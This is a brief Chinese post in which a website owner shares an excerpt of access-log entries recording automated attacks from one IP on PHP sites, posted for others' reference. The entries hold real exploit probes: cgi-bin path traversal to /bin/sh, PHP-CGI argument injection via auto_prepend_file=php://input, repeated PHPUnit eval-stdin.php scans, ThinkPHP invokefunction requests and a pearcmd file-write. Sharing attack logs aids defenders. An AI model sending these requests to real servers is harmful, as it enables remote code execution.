今天查看了下网站的访问日志,发现有较多的针对PHP网站的攻击日志,节选如下:
111.172.11.54 - - [24/Sep/2024:09:31:07 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 163 "-" "-" "-"
111.172.11.54 - - [24/Sep/2024:09:31:12 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 163 "-" "-" "-"
111.172.11.54 - - [24/Sep/2024:09:31:15 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 175 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:22 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 38 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:27 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 297 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:32 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 289 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:37 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 281 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:43 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 273 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:48 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 287 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:53 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:59 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 283 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:04 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 275 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:10 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 267 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:15 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 259 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:20 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 291 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:26 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 283 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:32 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 275 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:38 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 267 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:43 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:49 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 313 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:55 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:00 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 303 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:06 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:11 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:16 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:20 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 303 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:25 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:29 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:33 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 313 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:38 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 401 0 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:42 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:46 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:49 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:53 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:55 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:59 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:06 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:08 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:11 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:13 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:16 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:19 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:22 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:26 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:30 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
将这些攻击日志放出来,供大家参考。